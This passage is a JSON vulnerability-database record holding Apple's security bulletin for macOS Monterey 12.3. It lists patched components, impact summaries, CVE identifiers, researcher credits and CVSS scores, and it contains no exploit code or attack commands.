"CVE-2022-32849", "CVE-2022-32851", "CVE-2022-32852", "CVE-2022-32853", "CVE-2022-32857", "CVE-2022-32860", "CVE-2022-32861", "CVE-2022-32863", "CVE-2022-32880", "CVE-2022-32910", "CVE-2022-32948", "CVE-2022-42805"], "modified": "2022-07-20T00:00:00", "id": "APPLE:71C798D0F46D1E956B1D27B4A004E9B9", "href": "https://support.apple.com/kb/HT213345", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-18T14:56:52", "description": "# About the security content of macOS Monterey 12.3\n\nThis document describes the security content of macOS Monterey 12.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS Monterey 12.3\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: macOS Monterey\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry updated May 25, 2022\n\n**AMD**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22669: an anonymous researcher\n\n**AppKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2022-22665: Lockheed Martin Red Team\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22631: Wang Yu of cyberserval\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to read restricted memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\n\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\n**BOM**\n\nAvailable for: macOS Monterey\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**CoreTypes**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks to prevent unauthorized actions.\n\nCVE-2022-22663: Arsenii Kostromin (0x3c3e)\n\nEntry added May 25, 2022\n\n**CUPS**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26691: Joshua Mason of Mandiant\n\nEntry added May 25, 2022\n\n**curl**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in curl\n\nDescription: Multiple issues were addressed by updating to curl version 7.79.1.\n\nCVE-2021-22946\n\nCVE-2021-22947\n\nCVE-2021-22945\n\nEntry updated March 21, 2022\n\n**FaceTime**\n\nAvailable for: macOS Monterey\n\nImpact: A user may send audio and video in a FaceTime call without knowing that they have done so\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida\n\n**GarageBand MIDI**\n\nAvailable for: macOS Monterey\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2022-22657: Brandon Perry of Atredis Partners\n\n**GarageBand MIDI**\n\nAvailable for: macOS Monterey\n\nImpact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22664: Brandon Perry of Atredis Partners\n\n**Graphics Drivers**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2021-30977: Jack Dates of RET2 Systems, Inc.\n\nEntry added May 25, 2022\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22611: Xingyu Jin of Google\n\n**ImageIO**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: A memory consumption issue was addressed with improved memory handling.\n\nCVE-2022-22612: Xingyu Jin of Google\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-22661: an anonymous researcher, Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry updated May 25, 2022\n\n**IOGPUFamily**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22641: Mohamed Ghannam (@_simo36)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22614: an anonymous researcher\n\nCVE-2022-22615: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22640: sqrtpwn\n\n**libarchive**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in libarchive\n\nDescription: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.\n\nCVE-2021-36976\n\n**LLVM**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to delete files for which it does not have permission\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-21658: Florian Weimer (@fweimer)\n\nEntry added May 25, 2022\n\n**Login Window**\n\nAvailable for: macOS Monterey\n\nImpact: A person with access to a Mac may be able to bypass Login Window\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22647: Yuto Ikeda of Kyushu University\n\nEntry updated May 25, 2022\n\n**LoginWindow**\n\nAvailable for: macOS Monterey\n\nImpact: A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22656\n\n**MobileAccessoryUpdater**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**NSSpellChecker**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to access information about a user's contacts\n\nDescription: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.\n\nCVE-2022-22644: Thomas Roth (@stacksmashing) of leveldown security\n\nEntry updated May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to modify protected parts of the file system\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2022-26690: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious app with root privileges may be able to modify the contents of system files\n\nDescription: An issue in the handling of symlinks was addressed with improved validation.\n\nCVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\n**Preferences**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to read other applications' settings\n\nDescription: The issue was addressed with additional permissions checks.\n\nCVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\n**QuickTime Player**\n\nAvailable for: macOS Monterey\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Safari Downloads**\n\nAvailable for: macOS Monterey\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**Sandbox**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to bypass certain Privacy preferences\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran\n\nEntry updated May 25, 2022\n\n**Siri**\n\nAvailable for: macOS Monterey\n\nImpact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen\n\nDescription: A permissions issue was addressed with improved validation.\n\nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)\n\nEntry updated May 25, 2022\n\n**SMB**\n\nAvailable for: macOS Monterey\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22651: Felix Poulin-Belanger\n\n**SoftwareUpdate**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22639: Mickey Jin (@patch1t)\n\n**System Preferences**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to spoof system notifications and UI\n\nDescription: This issue was addressed with a new entitlement.\n\nCVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\n**UIKit**\n\nAvailable for: macOS Monterey\n\nImpact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22621: Joey Hewitt\n\n**Vim**\n\nAvailable for: macOS Monterey\n\nImpact: Multiple issues in Vim\n\nDescription: Multiple issues were addressed by updating Vim.\n\nCVE-2021-4136\n\nCVE-2021-4166\n\nCVE-2021-4173\n\nCVE-2021-4187\n\nCVE-2021-4192\n\nCVE-2021-4193\n\nCVE-2021-46059\n\nCVE-2022-0128\n\nCVE-2022-0156\n\nCVE-2022-0158\n\n**VoiceOver**\n\nAvailable for: macOS Monterey\n\nImpact: A user may be able to view restricted content from the lock screen\n\nDescription: A lock screen issue was addressed with improved state management.\n\nCVE-2021-30918: an anonymous researcher\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 232812 \nCVE-2022-22610: Quan Yin of Bigo Technology Live Client Team\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 233172 \nCVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\nWebKit Bugzilla: 234147 \nCVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nWebKit Bugzilla: 234966 \nCVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious website may cause unexpected cross-origin behavior\n\nDescription: A logic issue was addressed with improved state management.\n\nWebKit Bugzilla: 235294 \nCVE-2022-22637: Tom McKee of Google\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: A logic issue was addressed with improved restrictions.\n\nCVE-2022-22668: MrPhil17\n\n**xar**\n\nAvailable for: macOS Monterey\n\nImpact: A local user may be able to write arbitrary files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2022-22582: Richard Warren of NCC Group\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**AirDrop**\n\nWe would like to acknowledge Omar Espino (omespino.com), Ron Masas of BreakPoint.sh for their assistance.\n\n**Bluetooth**\n\nWe would like to acknowledge an anonymous researcher, chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab for their assistance.\n\n**Face Gallery**\n\nWe would like to acknowledge Tian Zhang (@KhaosT) for their assistance.\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.\n\n**Local Authentication**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**Notes**\n\nWe would like to acknowledge Nathaniel Ekoniak of Ennate Technologies for their assistance.\n\n**Password Manager**\n\nWe would like to acknowledge Maximilian Golla (@m33x) of Max Planck Institute for Security and Privacy (MPI-SP) for their assistance.\n\n**Siri**\n\nWe would like to acknowledge an anonymous researcher for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**TCC**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\n**UIKit**\n\nWe would like to acknowledge Tim Shadel of Day Logger, Inc. for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Abdullah Md Shaleh for their assistance.\n\n**WebKit Storage**\n\nWe would like to acknowledge Martin Bajanik of FingerprintJS for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 25, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22945", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-30918", "CVE-2021-30977", "CVE-2021-36976", "CVE-2021-4136", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-46059", "CVE-2022-0128", "CVE-2022-0156", "CVE-2022-0158", "CVE-2022-21658", "CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22600", "CVE-2022-22609", "CVE-2022-22610", "CVE-2022-22611", "CVE-2022-22612", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22621", "CVE-2022-22624", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22637", "CVE-2022-22638", "CVE-2022-22639", "CVE-2022-22640", "CVE-2022-22641", "CVE-2022-22643", "CVE-2022-22644", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22651", "CVE-2022-22656", "CVE-2022-22657", "CVE-2022-22660", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22663", "CVE-2022-22664", "CVE-2022-22665", "CVE-2022-22668", "CVE-2022-22669", "CVE-2022-22672", "CVE-2022-26688", "CVE-2022-26690", "CVE-2022-26691"], "modified": "2022-03-14T00:00:00", "id": "APPLE:C9EF751487C406A634B9CBD013ECD410", "href": "https://support.apple.com/kb/HT213183", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}

Details Released for Recently Patched new macOS Archive Utility Vulnerability

Description

Related